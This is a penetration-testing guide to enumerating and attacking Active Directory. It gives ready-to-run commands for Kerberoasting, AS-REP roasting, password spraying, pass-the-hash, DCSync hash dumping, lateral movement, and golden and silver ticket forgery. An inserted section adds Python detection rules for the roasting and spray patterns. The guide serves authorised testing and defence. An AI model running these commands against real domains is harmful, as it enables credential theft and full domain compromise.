Active Directory (AD) is at the heart of most enterprise networks. Understanding how to enumerate and attack AD environments is essential for penetration testers. This guide covers fundamental AD concepts, enumeration techniques, and common attack paths.
Active Directory Basics
Active Directory is a directory service that stores information about network resources and enables centralized management of users, computers, and policies.
Key Components
- Domain Controller (DC): Server that hosts AD services
- Domain: Logical grouping of objects (users, computers)
- Forest: Collection of one or more domains
- Organizational Unit (OU): Container for organizing objects
- Group Policy (GPO): Centralized configuration management
Initial Enumeration
Domain Information
# Get domain name
echo %USERDOMAIN%
systeminfo | findstr Domain
# Get domain controller
nltest /dclist:domain.local
nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local
# PowerShell
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-ADDomain
User Enumeration
# Net commands
net user /domain
net user username /domain
net group /domain
net group "Domain Admins" /domain
# PowerShell AD module
Get-ADUser -Filter * -Properties *
Get-ADUser -Filter * | Select Name,SamAccountName
Get-ADGroupMember "Domain Admins"
# LDAP queries with PowerView
Get-DomainUser
Get-DomainUser -Identity admin
Get-DomainGroup -Identity "Domain Admins"
Computer Enumeration
# PowerShell
Get-ADComputer -Filter * | Select Name,DNSHostName
# PowerView
Get-DomainComputer
Get-DomainComputer -Ping
BloodHound
BloodHound visualizes AD relationships and identifies attack paths:
# Collect data with SharpHound
.\SharpHound.exe -c All
# Or PowerShell collector
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All
# Start BloodHound
sudo neo4j start
bloodhound
# Import the zip file and analyze
Common Attack Techniques
Kerberoasting
Request service tickets for accounts with SPNs, then crack offline:
# Find SPNs
setspn -T domain.local -Q */*
# Request tickets (Rubeus)
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Request tickets (Impacket)
impacket-GetUserSPNs domain.local/user:password -dc-ip DC_IP -request
# Crack with hashcat
hashcat -m 13100 hashes.txt wordlist.txt
AS-REP Roasting
Target accounts with “Do not require Kerberos preauthentication”:
# Find vulnerable accounts
Get-DomainUser -PreauthNotRequired
# Get hashes (Rubeus)
.\Rubeus.exe asreproast /outfile:asrep.txt
# Get hashes (Impacket)
impacket-GetNPUsers domain.local/ -usersfile users.txt -dc-ip DC_IP
# Crack with hashcat
hashcat -m 18200 asrep.txt wordlist.txt
Password Spraying
# Spray single password across users
crackmapexec smb DC_IP -u users.txt -p 'Password123' --continue-on-success
# Kerbrute
./kerbrute passwordspray -d domain.local users.txt Password123
# Check lockout policy first!
net accounts /domain
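Each of the Kerberoasting, AS-REP roasting and password spraying techniques above leaves a distinct footprint in the domain controller's Security log: 4769 service ticket requests with RC4 encryption (0x17) for many SPNs from one account, 4768 TGT requests with Pre-Authentication Type 0 and an RC4 ticket, and 4771 pre-authentication failures with failure code 0x18 from one source against many accounts. The following is an added example (not from the original page) of detection logic for those three patterns run over constructed sample events; the simplified field names, the thresholds and the five-minute window are assumptions chosen for the illustration.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample Security log records (not from the original page); field
# names are simplified from the 4768/4769/4771 event data these rules use.
SAMPLE_EVENTS = [
    # Kerberoasting pattern: one user requests RC4 (0x17) tickets for many SPNs
    {"id": 4769, "time": "2024-01-01T10:00:00", "user": "jdoe", "service": "MSSQLSvc/db01", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-01-01T10:00:02", "user": "jdoe", "service": "HTTP/web01", "etype": "0x17", "status": "0x0"},
    {"id": 4769, "time": "2024-01-01T10:00:03", "user": "jdoe", "service": "CIFS/files01", "etype": "0x17", "status": "0x0"},
    # AS-REP roasting pattern: TGT issued with pre-auth type 0 and RC4 etype
    {"id": 4768, "time": "2024-01-01T10:05:00", "user": "svc_legacy", "preauth": "0", "etype": "0x17", "status": "0x0"},
    # Password spray pattern: one source IP, many accounts, failure code 0x18
    {"id": 4771, "time": "2024-01-01T10:10:00", "user": "alice", "ip": "10.0.0.9", "status": "0x18"},
    {"id": 4771, "time": "2024-01-01T10:10:01", "user": "bob", "ip": "10.0.0.9", "status": "0x18"},
    {"id": 4771, "time": "2024-01-01T10:10:02", "user": "carol", "ip": "10.0.0.9", "status": "0x18"},
    # Benign AES (0x12) service ticket request: must not alert
    {"id": 4769, "time": "2024-01-01T10:20:00", "user": "eve", "service": "CIFS/files01", "etype": "0x12", "status": "0x0"},
]

def bucket(ts, minutes=5):
    """Floor an ISO timestamp to a fixed window so counts are per (key, window)."""
    t = datetime.fromisoformat(ts)
    return t.replace(minute=t.minute - t.minute % minutes, second=0, microsecond=0)

def detect(events, spn_threshold=3, spray_threshold=3):
    """Return sorted (rule, subject) findings for the roasting and spray patterns."""
    findings = set()
    rc4_spns = defaultdict(set)   # (user, window) -> distinct SPNs requested with RC4
    failures = defaultdict(set)   # (source ip, window) -> accounts with bad-password failures
    for ev in events:
        window = bucket(ev["time"])
        if ev["id"] == 4769 and ev["etype"] == "0x17" and ev["status"] == "0x0":
            rc4_spns[(ev["user"], window)].add(ev["service"])
        elif ev["id"] == 4768 and ev.get("preauth") == "0" and ev["etype"] == "0x17":
            findings.add(("asrep_roast", ev["user"]))   # account has pre-auth disabled
        elif ev["id"] == 4771 and ev["status"] == "0x18":
            failures[(ev["ip"], window)].add(ev["user"])
    for (user, _), spns in rc4_spns.items():
        if len(spns) >= spn_threshold:
            findings.add(("kerberoast", user))
    for (ip, _), users in failures.items():
        if len(users) >= spray_threshold:
            findings.add(("password_spray", ip))
    return sorted(findings)

if __name__ == "__main__":
    for rule, subject in detect(SAMPLE_EVENTS):
        print(f"{rule}: {subject}")
```

Tune the thresholds to the environment's baseline; the AS-REP rule fires on a single event because the underlying finding is an account configuration (pre-authentication disabled) rather than a volume anomaly.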
Pass-the-Hash
# Use NTLM hash instead of password
impacket-psexec domain.local/admin@target -hashes :NTLM_HASH
impacket-wmiexec domain.local/admin@target -hashes :NTLM_HASH
impacket-smbexec domain.local/admin@target -hashes :NTLM_HASH
# CrackMapExec
crackmapexec smb target -u admin -H NTLM_HASH
Pass-the-Ticket
# Export tickets (Mimikatz)
sekurlsa::tickets /export
# Import ticket
kerberos::ptt ticket.kirbi
# Rubeus
.\Rubeus.exe ptt /ticket:ticket.kirbi
DCSync
If you have replication rights, dump all password hashes:
# Mimikatz
lsadump::dcsync /domain:domain.local /user:Administrator
# Impacket
impacket-secretsdump domain.local/admin:password@DC_IP
Lateral Movement
# PSExec
impacket-psexec domain.local/admin:password@target
# WMI
impacket-wmiexec domain.local/admin:password@target
# WinRM
evil-winrm -i target -u admin -p password
# PowerShell remoting
Enter-PSSession -ComputerName target -Credential domain\admin
Persistence
Golden Ticket
# Need krbtgt hash (from DCSync)
# Mimikatz
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:HASH /ptt
Silver Ticket
# Need service account hash
kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /target:server.domain.local /service:cifs /rc4:HASH /ptt
Summary
Active Directory penetration testing requires understanding both the technology and common misconfigurations. Start with enumeration using BloodHound to identify attack paths, then work through Kerberoasting, credential attacks, and lateral movement. Always document your findings and the attack chain used to compromise the domain.
